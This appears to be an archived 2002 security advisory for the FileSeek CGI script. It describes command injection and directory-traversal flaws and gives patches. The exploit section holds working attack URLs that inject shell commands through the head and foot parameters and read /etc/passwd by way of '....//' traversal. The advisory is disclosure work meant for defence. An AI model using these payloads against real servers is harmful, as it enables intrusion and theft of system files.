Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: fileseek.txt

Fileseek CGI script advisory




Best to read is the online version:
http://www.dsinet.org/textfiles/advisories/FileSeek-advisory.txt

------------------------------
 FileSeek cgi script Advisory
------------------------------

FileSeek.cgi / FileSeek2.cgi
16/04/2002
- by Thijs Bosschert (nighthawk@hackers4hackers.org)

-------------------
Vendor Information:
-------------------
Homepage        : http://www.cgi-perl.com
Written by : Craig Patchett
Vendor informed
 About bug : Months ago
 Mailed advisory: 14/04/02
Vender Response : None yet
Version on site : Still vulnerable


-------------------
Description:
-------------------
FileSeek is a cgi-script from "The CGI/Perl Cookbook from John Wiley &
Sons". The script is written by Craig Patchett. It is being used to find
and download files on a server.

-------------------
Affected  Versions:
-------------------
All

-------------------
Vulnerability:
-------------------
There are 2 vulnerabilities in the script. The first is that the script
doesn't filter escape characters to execute commands. This flaw has been
found also by another group, the advisory of that can be found on:
http://www.russiahack.com/advisories/adviseries112.txt

The second vulnerability is a directory transversal bug which let you
read any file on the server. This because of the script filtering "../"
out of the request, which can be bypassed if the request uses "....//"
which after filtering "../" out of it leaves "../" .


-------------------
Exploit:
-------------------

Command execution vulnerability:

http://host/cgi-bin/FileSeek.cgi?head=&foot=;id|
http://host/cgi-bin/FileSeek.cgi?head=;id|&foot=

http://host/cgi-bin/FileSeek.cgi?head=&foot=|id|
http://host/cgi-bin/FileSeek.cgi?head=|id|&foot=

Directory transversal vulnerability:

http://host/cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....
//....//....//etc/passwd
http://host/cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....
//....//etc/passwd&foot=

-------------------
Patch:
-------------------

Patch for Command execution vulnerability:

Add below the "Generate HTML page" part the following code:


########################################################################
####
   # Generate the HTML page
#

########################################################################
####

   $ARGS{'head'} =~ tr/\|\;/XX/;
   $ARGS{'foot'} =~ tr/\|\;/XX/;

This will make the request bogus if it contains a ; or |, so that it
will result in an error.


Patch for Directory transversal vulnerability:

Change the following Part:

   # Make sure they're not trying to access an invalid directory

   if ($directory =~ /$DD\.\./) { $directory = '' }
   $ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g;
   $ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g;

Into:

   # Make sure they're not trying to access an invalid directory

   if ($directory =~ /$DD\.\./) { $directory = '' }
   $ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g;
   $ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g;

This will make it filter on ".." and not on "../"




-------------------





TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH